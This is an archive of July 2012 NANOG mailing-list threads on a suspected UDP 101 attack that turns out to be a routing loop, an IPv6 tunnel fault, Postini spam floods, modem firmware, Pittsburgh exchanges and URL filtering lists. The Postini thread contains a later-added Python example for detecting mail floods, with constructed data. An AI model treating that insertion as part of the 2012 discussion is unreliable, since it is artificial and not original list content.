> Origin IGP, metric 0, localpref 100, valid, external
> Community: 4436:21216
>
> all of 36114(versaweb) traffic would seem to head through 53340(vegasnap) on the way home, so... maybe something else is going on like you didn't accept transit routes (or send them or something else) from your transit? hard to say with as little info as we see here, but :)
>
> > When I disconnect that user, I see that that packet is in loop again, because of that I am sure it's making a loop but I do not know the reason is that packets or not.
> >
> > Thanks
> >
> > On Sat, Jul 21, 2012 at 11:02 PM, Stefan Fouant <sfouant at shortestpathfirst.net> wrote:
> >
> >> Can you give us more information? What do you mean it is causing Layer 3 loops?
> >>
> >> Stefan Fouant
> >>
> >> Sent from my HTC on the Now Network from Sprint!
> >>
> >> ----- Reply message -----
> >> From: "Shahab Vahabzadeh"
> >> Date: Sat, Jul 21, 2012 10:50 am
> >> Subject: Attack on UDP 101
> >> To:
> >>
> >> Hi there,
> >> Does anybody know any report about attack on UDP Port 101 which make Layer 3 Loops?
> >> This is an example sniff:
> >>
> >> Source IP Address is : 76.164.199.86
> >> Source port: 62946 Destination port: 101
> >> 2012-07-21 11:11:09.646757
> >>
> >> Thanks
> >>
> >> --
> >> Regards,
> >> Shahab Vahabzadeh, Network Engineer and System Administrator
> >>
> >> Cell Phone: +1 (415) 871 0742
> >> PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 BF90
> >>
> >
> > --
> > Regards,
> > Shahab Vahabzadeh, Network Engineer and System Administrator
> >
> > Cell Phone: +1 (415) 871 0742
> > PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 BF90
>

--
Regards,
Shahab Vahabzadeh, Network Engineer and System Administrator

Cell Phone: +1 (415) 871 0742
PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 BF90

From morrowc.lists at gmail.com Sat Jul 21 15:53:38 2012
From: morrowc.lists at gmail.com (Christopher Morrow)
Date: Sat, 21 Jul 2012 16:53:38 -0400
Subject: Attack on UDP 101
In-Reply-To:
References: <500af5b0.26ee440a.3038.ffffab71SMTPIN_ADDED@mx.google.com>
Message-ID:

On Sat, Jul 21, 2012 at 3:12 PM, Shahab Vahabzadeh wrote:
> Can hardware problem make something happen?
>

a CEF corruption could, but really... I'd start with on both devices:
show ip route

and see if perhaps they both point to each other... then resolve that problem.

> On Sat, Jul 21, 2012 at 11:38 PM, Christopher Morrow wrote:
>>
>> On Sat, Jul 21, 2012 at 2:41 PM, Shahab Vahabzadeh wrote:
>> > Dear Stefan,
>> > I have a 7206VXR Router with this design:
>> >
>> > int gig 0/1: directly connected to 3750 switch (uplink to internet)
>> > int gig 0/2: vlan termination from PSTN centers
>> > int virtual-template1: xdsl users
>> >
>> > It's about 4 days that I see near 300Mbps outbound traffic in int gig0/1 that there is no such a traffic in none of routers interface, but the same traffic is seen in 3750 peer interface.
>> > I try to run monitor session on 3750 and monitor port traffic which I see that packet is generating from a user and it's in a loop between 3750 and 7206.
>>
>> I suspect that the 7206 and 3750 both think the other guy has default... and with no more specific to follow the packet just pingpongs between the 2 devices. I would also suspect you see this for more than one destination :(
>>
>> picking just one entry (last entry I see) from route-views.routeviews.org:
>> BGP routing table entry for 76.164.192.0/19, version 708055091
>> Paths: (35 available, best #31, table Default-IP-Routing-Table)
>> ...
>> 4436 6939 53340 36114
>> 69.31.111.244 from 69.31.111.244 (69.31.111.244)
>> Origin IGP, metric 0, localpref 100, valid, external
>> Community: 4436:21216
>>
>> all of 36114(versaweb) traffic would seem to head through 53340(vegasnap) on the way home, so... maybe something else is going on like you didn't accept transit routes (or send them or something else) from your transit? hard to say with as little info as we see here, but :)
>>
>> > When I disconnect that user, I see that that packet is in loop again, because of that I am sure it's making a loop but I do not know the reason is that packets or not.
>> >
>> > Thanks
>> >
>> > On Sat, Jul 21, 2012 at 11:02 PM, Stefan Fouant <sfouant at shortestpathfirst.net> wrote:
>> >
>> >> Can you give us more information? What do you mean it is causing Layer 3 loops?
>> >>
>> >> Stefan Fouant
>> >>
>> >> Sent from my HTC on the Now Network from Sprint!
>> >>
>> >> ----- Reply message -----
>> >> From: "Shahab Vahabzadeh"
>> >> Date: Sat, Jul 21, 2012 10:50 am
>> >> Subject: Attack on UDP 101
>> >> To:
>> >>
>> >> Hi there,
>> >> Does anybody know any report about attack on UDP Port 101 which make Layer 3 Loops?
>> >> This is an example sniff:
>> >>
>> >> Source IP Address is : 76.164.199.86
>> >> Source port: 62946 Destination port: 101
>> >> 2012-07-21 11:11:09.646757
>> >>
>> >> Thanks
>> >>
>> >> --
>> >> Regards,
>> >> Shahab Vahabzadeh, Network Engineer and System Administrator
>> >>
>> >> Cell Phone: +1 (415) 871 0742
>> >> PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 BF90
>> >>
>> >
>> > --
>> > Regards,
>> > Shahab Vahabzadeh, Network Engineer and System Administrator
>> >
>> > Cell Phone: +1 (415) 871 0742
>> > PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 BF90
>
> --
> Regards,
> Shahab Vahabzadeh, Network Engineer and System Administrator
>
> Cell Phone: +1 (415) 871 0742
> PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 BF90
>

From jeroen at mompl.net Sun Jul 22 02:40:02 2012
From: jeroen at mompl.net (Jeroen van Aart)
Date: Sun, 22 Jul 2012 00:40:02 -0700
Subject: HE Fremont IPv6 tunnel
Message-ID: <500BAE52.202@mompl.net>

Recently I migrated the server that's running an HE IPv6 tunnel to one of the Fremont endpoints and now the tunnel is going down for a few minutes every couple of hours or so. I haven't been able yet to find a reason for this. I made sure the old server is not running any IPv6 related things anymore (such as radvd).

I am curious if anyone knows if the Fremont endpoints are experiencing some problems? I have barely ever noticed any problems with the IPv6 tunnels so I am pretty sure it's not on HE's side, but I wanted to make sure.

Thanks,
Jeroen

--
Earthquake Magnitude: 4.6
Date: Sunday, July 22, 2012 06:32:50 UTC
Location: Santa Cruz Islands region
Latitude: -10.6712; Longitude: 164.7985
Depth: 37.00 km

From rmosher at he.net Sun Jul 22 02:53:00 2012
From: rmosher at he.net (Rob Mosher)
Date: Sun, 22 Jul 2012 03:53:00 -0400
Subject: HE Fremont IPv6 tunnel
In-Reply-To: <500BAE52.202@mompl.net>
References: <500BAE52.202@mompl.net>
Message-ID: <500BB15C.6020305@he.net>

Perhaps you should try contacting HE support. I hear they're responsive.

--
Rob Mosher
Senior Network and Software Engineer
Hurricane Electric / AS6939

On 7/22/2012 3:40 AM, Jeroen van Aart wrote:
>
> I am curious if anyone knows if the Fremont endpoints are experiencing some problems? I have barely ever noticed any problems with the IPv6 tunnels so I am pretty sure it's not on HE's side, but I wanted to make sure.

From lyle at lcrcomputer.net Sun Jul 22 10:04:10 2012
From: lyle at lcrcomputer.net (Lyle Giese)
Date: Sun, 22 Jul 2012 10:04:10 -0500
Subject: Postini/google email admin assistance requested
Message-ID: <500C166A.3080909@lcrcomputer.net>

I run a smaller email filter service for clients and starting Saturday, we are experiencing heavy traffic aimed at one email account. 99% of the traffic is coming from obsmtp.com servers.

In the last 24 hrs, we have been getting over 1,000 attempts per hour to this account with a couple of peaks at 4,000 per hour.

Not sure if they can help but an offlist contact from them would be nice.

Sorry for the noise to the rest!

Lyle Giese
LCR Computer Services, Inc.

From ops.lists at gmail.com Sun Jul 22 10:09:18 2012
From: ops.lists at gmail.com (Suresh Ramasubramanian)
Date: Sun, 22 Jul 2012 20:39:18 +0530
Subject: Postini/google email admin assistance requested
In-Reply-To: <500C166A.3080909@lcrcomputer.net>
References: <500C166A.3080909@lcrcomputer.net>
Message-ID:

Did your customer set up an MX for their domain pointing to postini and then forward it to you?

On Sun, Jul 22, 2012 at 8:34 PM, Lyle Giese wrote:
> I run a smaller email filter service for clients and starting Saturday, we are experiencing heavy traffic aimed at one email account. 99% of the traffic is coming from obsmtp.com servers.
>
> In the last 24 hrs, we have been getting over 1,000 attempts per hour to this account with a couple of peaks at 4,000 per hour.
>
> Not sure if they can help but an offlist contact from them would be nice.
>
> Sorry for the noise to the rest!

--
Suresh Ramasubramanian (ops.lists at gmail.com)

From johnl at iecc.com Sun Jul 22 11:14:09 2012
From: johnl at iecc.com (John Levine)
Date: 22 Jul 2012 16:14:09 -0000
Subject: Postini/google email admin assistance requested
In-Reply-To:
Message-ID: <20120722161409.71092.qmail@joyce.lan>

In article you write:
>Did your customer set up an MX for their domain pointing to postini and then forward it to you?

obsmtp.com is Postini's outbound servers for customer mail. In my experience, they gush spam, and Postini management has been impressively hostile to the suggestion that a spam filtering company should, you know, filter spam.

On my smallish mail server, I direct nearly all of their mail into the spamtrap, picking out only a handful of envelope domains that I've observed sending legit mail.

R's,
John

>On Sun, Jul 22, 2012 at 8:34 PM, Lyle Giese wrote:
>> I run a smaller email filter service for clients and starting Saturday, we are experiencing heavy traffic aimed at one email account. 99% of the traffic is coming from obsmtp.com servers.
>>
>> In the last 24 hrs, we have been getting over 1,000 attempts per hour to this account with a couple of peaks at 4,000 per hour.
>>
>> Not sure if they can help but an offlist contact from them would be nice.
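The two observations in the Postini thread above, a flood of attempts aimed at a single mailbox and John Levine's practice of spamtrapping mail from a relay except for a handful of envelope domains seen sending legitimate mail, are the kind of thing a small filtering MTA operator can script. The block below is an added example written for this archive page; it is not code from the thread, from Postini or from Google. The log-line format, the client hostnames, the envelope domains, the allowlist and the per-hour threshold (5, scaled down from the 1,000 per hour Lyle reports so the sample stays short) are all constructed for the example:

```python
"""Added example: spot a per-recipient delivery flood in MTA logs and apply a
relay-specific envelope-domain allowlist.

Log format, hostnames, addresses, allowlist and threshold are constructed for
this example; none of it comes from the thread, Postini or Google."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple

# One line per delivery attempt, in a constructed format a small filtering MTA
# might log: timestamp, connecting client, envelope sender, recipient.
LOG_LINE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}) "
    r"client=(?P<client>\S+) from=<(?P<sender>[^>]*)> to=<(?P<rcpt>[^>]+)>$"
)

# Constructed sample: one mailbox receives a burst relayed through *.obsmtp.com
# hosts; one envelope domain is one the operator has seen sending legitimate mail.
SAMPLE_LOG = [
    "2012-07-22T09:00:01 client=exprod5og101.obsmtp.com from=<offer@bulk-a.test> to=<target@example.net>",
    "2012-07-22T09:04:17 client=exprod5og102.obsmtp.com from=<deal@bulk-b.test> to=<target@example.net>",
    "2012-07-22T09:09:45 client=exprod5og101.obsmtp.com from=<news@bulk-a.test> to=<target@example.net>",
    "2012-07-22T09:15:02 client=exprod6og107.obsmtp.com from=<billing@trusted-customer.test> to=<target@example.net>",
    "2012-07-22T09:22:38 client=exprod5og103.obsmtp.com from=<promo@bulk-c.test> to=<target@example.net>",
    "2012-07-22T09:31:11 client=exprod5og101.obsmtp.com from=<promo@bulk-c.test> to=<target@example.net>",
    "2012-07-22T09:47:59 client=mail.other-relay.test from=<alice@friend.test> to=<target@example.net>",
    "2012-07-22T10:02:13 client=exprod5og102.obsmtp.com from=<deal@bulk-b.test> to=<target@example.net>",
    "2012-07-22T10:10:40 client=exprod5og104.obsmtp.com from=<billing@trusted-customer.test> to=<bob@example.net>",
    "2012-07-22T10:12:05 client=mail.other-relay.test from=<carol@friend.test> to=<bob@example.net>",
]

# Envelope sender domains let through from the relay (constructed allowlist).
ALLOWED_ENVELOPE_DOMAINS = frozenset({"trusted-customer.test"})


@dataclass(frozen=True)
class Attempt:
    ts: str
    client: str
    sender: str
    rcpt: str


def parse_log(lines: Iterable[str]) -> List[Attempt]:
    """Parse log lines, skipping any that do not match the expected format."""
    attempts = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m:
            attempts.append(Attempt(**m.groupdict()))
    return attempts


def attempts_per_hour(attempts: Iterable[Attempt]) -> Dict[Tuple[str, str], int]:
    """Count delivery attempts per (recipient, hour); the hour key is the
    timestamp truncated to 'YYYY-MM-DDTHH'."""
    counts: Counter = Counter()
    for a in attempts:
        counts[(a.rcpt.lower(), a.ts[:13])] += 1
    return dict(counts)


def flooded_recipients(attempts: Iterable[Attempt], threshold: int) -> List[Tuple[str, str, int]]:
    """Recipient/hour pairs at or above the threshold, as (rcpt, hour, count)."""
    return sorted(
        (rcpt, hour, n)
        for (rcpt, hour), n in attempts_per_hour(attempts).items()
        if n >= threshold
    )


def sender_domain(address: str) -> str:
    return address.rpartition("@")[2].lower()


def classify(attempt: Attempt, relay_suffix: str = ".obsmtp.com",
             allowed=ALLOWED_ENVELOPE_DOMAINS) -> str:
    """Policy for mail arriving via the relay: accept only allowlisted envelope
    domains and send everything else from it to the spamtrap. Mail from any
    other client goes through normal filtering ('normal')."""
    if not attempt.client.lower().endswith(relay_suffix):
        return "normal"
    return "accept" if sender_domain(attempt.sender) in allowed else "spamtrap"


def summarize(lines: Iterable[str], threshold: int = 5) -> dict:
    """Flood report plus a tally of policy verdicts for a batch of log lines."""
    attempts = parse_log(lines)
    return {
        "flooded": flooded_recipients(attempts, threshold),
        "verdicts": dict(Counter(classify(a) for a in attempts)),
    }


if __name__ == "__main__":
    report = summarize(SAMPLE_LOG)
    for rcpt, hour, n in report["flooded"]:
        print(f"{rcpt}: {n} attempts in hour {hour}")
    print(report["verdicts"])
```

On the sample, `summarize` reports target@example.net as flooded in the 09:00 hour and tallies two accepted, six spamtrapped and two normally filtered attempts. The allowlist keys on the envelope sender domain because that is what the operator observed as legitimate; matching the relay on a hostname suffix is only as trustworthy as the reverse DNS the MTA logged, so a production version would key on the connecting address range instead.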
From sotnickd-nanog at ddv.com Sun Jul 22 13:56:05 2012
From: sotnickd-nanog at ddv.com (Dave Sotnick)
Date: Sun, 22 Jul 2012 11:56:05 -0700
Subject: Comcast cable modem software update push
Message-ID:

Dear Nanog Users,

I have recently been plagued by intermittent lockups on my Motorola BitSurfer 6121 cable modem, which I purchased based on Comcast's lists of recommended devices, and having good experience with Motorola products in the past. There's a good discussion on this topic here:
http://goo.gl/SfHdh

My technical question for the group is: When I finally talk to Comcast Tier 2 this week, what do I need to tell them to convince them that pushing out an update to SB6121 modems is a good idea? They seem convinced the onus is on Motorola to provide updates. This is not how DOCSIS 3.0 works!

FWIW, the installed OS is 1.0.3.3 dated Aug 12 2010. The most recent I have heard of is 1.0.6.6. Apparently this fixes the lockups.

Any tips greatly appreciated.

-Dave

From listbox at unix-boy.com Sun Jul 22 14:49:30 2012
From: listbox at unix-boy.com (Jeremy)
Date: Sun, 22 Jul 2012 15:49:30 -0400
Subject: Comcast cable modem software update push
In-Reply-To:
References:
Message-ID: <500C594A.2030208@unix-boy.com>

On 7/22/2012 2:56 PM, Dave Sotnick wrote:
> Dear Nanog Users,
>
> I have recently been plagued by intermittent lockups on my Motorola BitSurfer 6121 cable modem, which I purchased based on Comcast's lists of recommended devices, and having good experience with Motorola products in the past. There's a good discussion on this topic here:
> http://goo.gl/SfHdh
>
> My technical question for the group is: When I finally talk to Comcast Tier 2 this week, what do I need to tell them to convince them that pushing out an update to SB6121 modems is a good idea? They seem convinced the onus is on Motorola to provide updates. This is not how DOCSIS 3.0 works!
>
> FWIW, the installed OS is 1.0.3.3 dated Aug 12 2010. The most recent I have heard of is 1.0.6.6. Apparently this fixes the lockups.
>
> Any tips greatly appreciated.
>
> -Dave
>

Dave,

/lurk mode off

Each MSO has its own procedures for reviewing and certifying firmware for their networks. The various DOCSIS features work with varying levels of success on different code revisions, so the testing tends to be extensive. When I worked at an MSO in my previous position, the process would be to lab test and then field soak for several months prior to releasing an update. Even then, we would still be bitten by bugs with strange trigger conditions.

Assuming that process is the same at Comcast, you are likely to have little success in convincing them to speed up the deployment of new code, especially if the DOCSIS engineering group has not completed testing and fully vetted the code. Your best bet is simply to see if there is newer code available that they have approved.

Just for comparison, I have a Moto Surfboard 6121 attached to TWC and I'm on firmware version 1.0.5.1 dated 12/21/2010 (possibly installed when I was still a Cox customer).

/lurk on

Jeremy

From ml at kenweb.org Sun Jul 22 21:44:34 2012
From: ml at kenweb.org (ML)
Date: Sun, 22 Jul 2012 22:44:34 -0400
Subject: Pittsburgh IX?
Message-ID: <500CBA92.8040901@kenweb.org>

I was looking for information on any IX in Pittsburgh. Found PitX [1] ..info is rather limited to say the least. Is there any information out there about participants, size, etc?

Are there any other IXes in or near Pittsburgh by chance? I see 3Rox out there but seems to be a R&E network mostly.

-ML

[1] http://www.pitx.net/

From jeroen at mompl.net Sun Jul 22 22:44:59 2012
From: jeroen at mompl.net (Jeroen van Aart)
Date: Sun, 22 Jul 2012 20:44:59 -0700
Subject: HE Fremont IPv6 tunnel
In-Reply-To: <500BB15C.6020305@he.net>
References: <500BAE52.202@mompl.net> <500BB15C.6020305@he.net>
Message-ID: <500CC8BB.7000907@mompl.net>

Rob Mosher wrote:
> Perhaps you should try contacting HE support. I hear they're responsive.

I understand, however I was pretty sure it wasn't the tunnel that was the problem. So I didn't feel emailing HE was appropriate.

I am curious, since I have pretty much confirmed the problem is on my side, why would a move of an IPv6 tunnel from one server to another suddenly cause intermittent outages of a few minutes every couple of hours. It's not as regular so as to suspect a cronjob or something.

The old server is still online, however the radvd daemon isn't running there anymore and its external interface has been disabled. There is no IPv6 dhcp server running either. The new server basically has the configuration and IP addresses the old one used to have. It's running radvd.

Is there some (obvious) residual effect of having moved an IPv6 tunnel from one physical server to another that I fail to recognise? I have moved ethernet interfaces and cables on the new server to rule out a fault in those. Its internal interface (on the same ethernet card) appears very stable.

Thanks,
Jeroen

--
Earthquake Magnitude: 5.2
Date: Monday, July 23, 2012 00:22:05 UTC
Location: near the north coast of Papua, Indonesia
Latitude: -2.5213; Longitude: 135.3425
Depth: 10.40 km

From streiner at cluebyfour.org Sun Jul 22 23:17:51 2012
From: streiner at cluebyfour.org (Justin M. Streiner)
Date: Mon, 23 Jul 2012 00:17:51 -0400 (EDT)
Subject: Pittsburgh IX?
In-Reply-To: <500CBA92.8040901@kenweb.org>
References: <500CBA92.8040901@kenweb.org>
Message-ID:

On Sun, 22 Jul 2012, ML wrote:

> I was looking for information on any IX in Pittsburgh. Found PitX [1] ..info is rather limited to say the least. Is there any information out there about participants, size, etc?

I'm not 100% sure if PitX is still in operation. I know the guys who ran it, and can check what the status is, if you want.

> Are there any other IXes in or near Pittsburgh by chance? I see 3Rox out there but seems to be a R&E network mostly.

3ROX is primarily R&E, but there are a few commercial providers who peer there - Comcast is the biggest one that comes to mind. I have contacts there as well, if you're interested in looking into it.

Beyond that, I don't think there are any IXes in the Pittsburgh area.

jms

From jeroen at mompl.net Mon Jul 23 02:33:48 2012
From: jeroen at mompl.net (Jeroen van Aart)
Date: Mon, 23 Jul 2012 00:33:48 -0700
Subject: HE Fremont IPv6 tunnel
In-Reply-To: <500CC8BB.7000907@mompl.net>
References: <500BAE52.202@mompl.net> <500BB15C.6020305@he.net> <500CC8BB.7000907@mompl.net>
Message-ID: <500CFE5C.8050209@mompl.net>

Jeroen van Aart wrote:
> I am curious, since I have pretty much confirmed the problem is on my side, why would a move of an IPv6 tunnel from one server to another

A helpful person pointed me in the right direction. Multiple times I checked the /etc/network/interfaces file and didn't spot it. But I had forgotten to remove the gateway for the internal interface... after switching IPs and enabling the external interface. Stupid mistake, and obviously it sort of works, but not well.

Thanks,
Jeroen

--
Earthquake Magnitude: 5.1
Date: Monday, July 23, 2012 06:54:24 UTC
Location: Near Islands, Aleutian Islands, Alaska
Latitude: 51.4620; Longitude: 171.7920
Depth: 33.00 km

From seitz at strato-rz.de Mon Jul 23 07:45:57 2012
From: seitz at strato-rz.de (Christian Seitz)
Date: Mon, 23 Jul 2012 14:45:57 +0200
Subject: msn/hotmail email admin needed
Message-ID: <500D4785.4000805@strato-rz.de>

Hello,

would an email admin from msn/hotmail please contact me off-list? We have problems sending emails to msn/hotmail from several ip addresses and trying to find someone who can help. Thanks in advance.

Sorry for spamming this list, but establishing a direct contact or opening tickets did not work.
Regards, Christian Seitz Network Operations -- --------------------------------------------------------------------------- Telefon: +49 (0)30 - 398 02 0 E-Mail : seitz at strato-rz.de Website: http://www.strato.de/ --------------------------------------------------------------------------- STRATO AG Pascalstr. 10 10587 Berlin --------------------------------------------------------------------------- Vorsitzender des Aufsichtsrates: Phil Zamani Vorstand: Damian Schmidt (Vorsitz), Julien Ardisson, Christian Mueller, Christoph Steffens, Rene Wienholtz Amtsgericht Berlin-Charlottenburg HRB 79450 From the.lists at mgm51.com Mon Jul 23 08:05:54 2012 From: the.lists at mgm51.com (Mike.) Date: Mon, 23 Jul 2012 09:05:54 -0400 Subject: Comcast cable modem software update push In-Reply-To: References: Message-ID: <201207230905540270.0014D336@sentry.24cl.com> On 7/22/2012 at 11:56 AM Dave Sotnick wrote: |Dear Nanog Users, | |I have recently been plagued by intermittent lockups on my Motorola |BitSurfer 6121 cable modem, which I purchased based on Comcast's lists |of recommended devices, and having good experience with Motorola |products in the past. There's a good discussion on this topic here: |http://goo.gl/SfHdh | |My technical question for the group is: When I finally talk to Comcast |Tier 2 this week, what do I need to tell them to convince them that |pushing out an update to SB6121 modems is a good idea? They seem |convinced the onus is on Motorola to provide updates. This is not how |DOCSIS 3.0 works! | |FWIW, the installed OS is 1.0.3.3 dated Aug 12 2010. The most recent I |have heard of is 1.0.6.6. Apparently this fixes the lockups. | |Any tips greatly appreciated. 
| |-Dave ============= Some more info here: http://www.dslreports.com/forum/r27346001-SB6120-Firmware-Updated-7-19-1 2- shortened: http://goo.gl/9fZRW From ops.lists at gmail.com Mon Jul 23 08:22:21 2012 From: ops.lists at gmail.com (Suresh Ramasubramanian) Date: Mon, 23 Jul 2012 18:52:21 +0530 Subject: msn/hotmail email admin needed In-Reply-To: <500D4785.4000805@strato-rz.de> References: <500D4785.4000805@strato-rz.de> Message-ID: Fixing whatever is the spam issue is about the only way you will get off their filters. All the hotmail support team will send you back is boilerplate that tells you much the same (maybe in a few more paragraphs, and with links to microsoft's policy) If that means securing your outbound mailservers against spam .. or booting some customers - you might as well get it over and done with --srs On Mon, Jul 23, 2012 at 6:15 PM, Christian Seitz wrote: > > would an email admin from msm/hotmail please contact me off-list? We have > problems sending emails to msn/hotmail from several ip addresses and > trying to > find someone who can help. Thanks in advance. > > Sorry for spamming this list, but establishing a direct contact or opening > tickets did not work. > -- Suresh Ramasubramanian (ops.lists at gmail.com) From dave at temk.in Mon Jul 23 15:13:58 2012 From: dave at temk.in (David Temkin) Date: Mon, 23 Jul 2012 16:13:58 -0400 Subject: Reminder: Call for Presentations Open for NANOG 56 in Dallas, TX Message-ID: <500DB086.8010303@temk.in> NANOG Community, After a great NANOG in Vancouver, BC, the survey results are in from 55 and we are already assembling a world-class program for NANOG 56. The North American Network Operators' Group (NANOG) will hold its 56th meeting in Dallas, TX on October 21 - 23, 2012 and join with ARIN on October 24, 2012. Terremark, a Verzion company, will be our host for NANOG 56. 
The NANOG Program Committee is now seeking proposals for presentations, panels, tutorials, tracks sessions, and keynote materials for the NANOG 56 program. We invite presentations highlighting issues relating to technology already deployed or soon-to-be deployed in the Internet. Vendors are encouraged to work with operators to present real-world deployment experiences with the vendor's products and interoperability. NANOG 56 submissions are welcome at http://pc.nanog.org For further information on what the Program Committee is seeking, please see http://www.nanog.org/meetings/nanog56/callforpresentations.html When considering submitting a presentation, keep these important dates in mind: Presentation Abstracts and Draft Slides Due: 06-August-2012 Final Slides Due: 27-August-2012 Draft Program Published: 17-September-2012 Final Agenda Published: 1-October-2012 Please submit your materials to http://pc.nanog.org Looking forward to seeing everyone in Dallas! -Dave Temkin (Chair, NANOG Program Committee) From dave at temk.in Mon Jul 23 15:13:58 2012 From: dave at temk.in (David Temkin) Date: Mon, 23 Jul 2012 16:13:58 -0400 Subject: [NANOG-announce] Reminder: Call for Presentations Open for NANOG 56 in Dallas, TX Message-ID: <500DB086.8010303@temk.in> NANOG Community, After a great NANOG in Vancouver, BC, the survey results are in from 55 and we are already assembling a world-class program for NANOG 56. The North American Network Operators' Group (NANOG) will hold its 56th meeting in Dallas, TX on October 21 - 23, 2012 and join with ARIN on October 24, 2012. Terremark, a Verizon company, will be our host for NANOG 56. The NANOG Program Committee is now seeking proposals for presentations, panels, tutorials, tracks sessions, and keynote materials for the NANOG 56 program. We invite presentations highlighting issues relating to technology already deployed or soon-to-be deployed in the Internet.
Vendors are encouraged to work with operators to present real-world deployment experiences with the vendor's products and interoperability. NANOG 56 submissions are welcome at http://pc.nanog.org For further information on what the Program Committee is seeking, please see http://www.nanog.org/meetings/nanog56/callforpresentations.html When considering submitting a presentation, keep these important dates in mind: Presentation Abstracts and Draft Slides Due: 06-August-2012 Final Slides Due: 27-August-2012 Draft Program Published: 17-September-2012 Final Agenda Published: 1-October-2012 Please submit your materials to http://pc.nanog.org Looking forward to seeing everyone in Dallas! -Dave Temkin (Chair, NANOG Program Committee) -------------- next part -------------- _______________________________________________ NANOG-announce mailing list NANOG-announce at nanog.org https://mailman.nanog.org/mailman/listinfo/nanog-announce From woody at pch.net Mon Jul 23 19:13:51 2012 From: woody at pch.net (Bill Woodcock) Date: Mon, 23 Jul 2012 17:13:51 -0700 Subject: Pittsburgh IX? In-Reply-To: <500CBA92.8040901@kenweb.org> References: <500CBA92.8040901@kenweb.org> Message-ID: On Jul 22, 2012, at 7:44 PM, ML wrote: > I was looking for information on any IX in Pittsburgh. Found PitX [1] ..info is rather limited to say the least. Is there any information out there about participants, size, etc? Here: https://prefix.pch.net/applications/ixpdir/detail.php?exchange_point_id=331 Last known was seven participants and 5Mbps of traffic, but they reorganized their web site and no longer have members or traffic graph pages at the previous locations. I'll have our research staff start digging into it. 
-Bill From sotnickd-nanog at ddv.com Tue Jul 24 11:28:25 2012 From: sotnickd-nanog at ddv.com (Dave Sotnick) Date: Tue, 24 Jul 2012 09:28:25 -0700 Subject: Comcast cable modem software update push In-Reply-To: References: Message-ID: Well I'm not sure if it was the squeaky wheel getting the grease or just good timing, but I'm happy to report that this morning my Motorola SB6121 grabbed the firmware update and is now running the latest code. I'm fairly confident this will resolve my lockups. Thanks, Nanog! -Dave On Sun, Jul 22, 2012 at 11:56 AM, Dave Sotnick wrote: > Dear Nanog Users, > > I have recently been plagued by intermittent lockups on my Motorola > BitSurfer 6121 cable modem, which I purchased based on Comcast's lists > of recommended devices, and having good experience with Motorola > products in the past. There's a good discussion on this topic here: > http://goo.gl/SfHdh > > My technical question for the group is: When I finally talk to Comcast > Tier 2 this week, what do I need to tell them to convince them that > pushing out an update to SB6121 modems is a good idea? They seem > convinced the onus is on Motorola to provide updates. This is not how > DOCSIS 3.0 works! > > FWIW, the installed OS is 1.0.3.3 dated Aug 12 2010. The most recent I > have heard of is 1.0.6.6. Apparently this fixes the lockups. > > Any tips greatly appreciated. > > -Dave From nathan at atlasnetworks.us Tue Jul 24 13:37:24 2012 From: nathan at atlasnetworks.us (Nathan Eisenberg) Date: Tue, 24 Jul 2012 18:37:24 +0000 Subject: Contact from slb.com/Schlumberger Limited/Dexanet Message-ID: <8C26A4FDAE599041A13EB499117D3C2889ACE92D@EX-MB-1.corp.atlasnetworks.us> Would a security contact from Schlumberger Limited please contact me off-list? Sorry for the noise. 
Nathan Eisenberg From joesox at gmail.com Tue Jul 24 20:30:18 2012 From: joesox at gmail.com (JoeSox) Date: Tue, 24 Jul 2012 18:30:18 -0700 Subject: url category database, flat file lists, or API Message-ID: Does anyone know of an open source database, flat file lists, or API that allows me to feed a url and have it return a category classification. For example, something like this http://www1.k9webprotection.com/support/check-site-rating I know of dansguardian but it doesn't have battlefield.com as a game site and is more of a blacklist. I thought I saw one a few years back but it was only for linux but still had categories. -- Thanks, Joe From morrowc.lists at gmail.com Tue Jul 24 20:32:10 2012 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Tue, 24 Jul 2012 21:32:10 -0400 Subject: url category database, flat file lists, or API In-Reply-To: References: Message-ID: http://www.urlfilterdb.com/en/support/faq.html On Tue, Jul 24, 2012 at 9:30 PM, JoeSox wrote: > Does anyone know of an open source database, flat file lists, or API > that allows me to feed a url and have it return a category > classification > For example, something like this > http://www1.k9webprotection.com/support/check-site-rating > > I know of dansguardian but it doesn't have battlefield.com as a game > site and is more of a blacklist. > I thought I saw one a few years back but it was only for linux but > still had categories.
> -- > Thanks, Joe > From morrowc.lists at gmail.com Tue Jul 24 20:32:42 2012 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Tue, 24 Jul 2012 21:32:42 -0400 Subject: url category database, flat file lists, or API In-Reply-To: References: Message-ID: from this search, fyi: https://www.google.com/search?q=squid+url+filtering+classification On Tue, Jul 24, 2012 at 9:32 PM, Christopher Morrow wrote: > http://www.urlfilterdb.com/en/support/faq.html > > On Tue, Jul 24, 2012 at 9:30 PM, JoeSox wrote: >> Does anyone know of a open source database, flat file lists, or API >> that allows me to feed a url and have it return a category >> classification >> For example, something like this >> http://www1.k9webprotection.com/support/check-site-rating >> >> I know of dansguardian but it doesn't have battlefield.com as a game >> site and is more of a blacklist. >> I thought I saw one a few years back but it was only for linux but >> still had categories. >> -- >> Thanks, Joe >> From joesox at gmail.com Tue Jul 24 20:40:22 2012 From: joesox at gmail.com (JoeSox) Date: Tue, 24 Jul 2012 18:40:22 -0700 Subject: url category database, flat file lists, or API In-Reply-To: References: Message-ID: Looks like urlfilterdb isn't completely free but might be a solution. I forgot the SQUID might have builtin classifications so I need to look at that. 
